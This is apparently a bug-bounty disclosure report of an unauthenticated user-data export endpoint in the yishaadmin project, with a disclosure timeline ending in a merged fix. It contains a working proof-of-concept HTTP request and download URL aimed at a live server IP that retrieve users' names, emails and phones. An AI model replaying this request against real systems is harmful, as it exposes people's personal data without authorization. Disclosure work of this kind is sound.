Improper Authentication in liukuo362573/yishaadmin

Valid

Reported on

Jan 24th 2022


Description

Hi, I would like to report an improper authentication vulnerability in https://www.github.com/liukuo362573/yishaadmin. Endpoint "/admin/OrganizationManage/User/ExportUserJson" does not require any authentication and return xls file contain users data like username, fullname, email, phone.

Proof of Concept

  • Step 1: using BurpSuite and call this request
POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1
Host: 106.14.124.170
Content-Length: 65
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://106.14.124.170
Referer: http://106.14.124.170/admin/OrganizationManage/User/UserIndex
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

DepartmentId=&UserName=&Mobile=&UserStatus=-1&StartTime=&EndTime=
  • Step 2: Get Data in response and go to "http://106.14.124.170/admin/" + Data to download all users data. Example: http://106.14.124.170/admin/Resource/Export/Excel/259208c46e9f4bedb1c64bac56d9f16c_%E7%94%A8%E6%88%B7%E5%88%97%E8%A1%A8.xls

Impact

Unauthenticated user can get the data off all users in application.

We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. 4 months ago
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back 4 months ago
We have sent a follow up to the liukuo362573/yishaadmin team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the liukuo362573/yishaadmin team. We will try again in 10 days. 4 months ago
liukuo362573 validated this vulnerability 4 months ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
liukuo362573 confirmed that a fix has been merged on 05f615 4 months ago
The fix bounty has been dropped
to join this conversation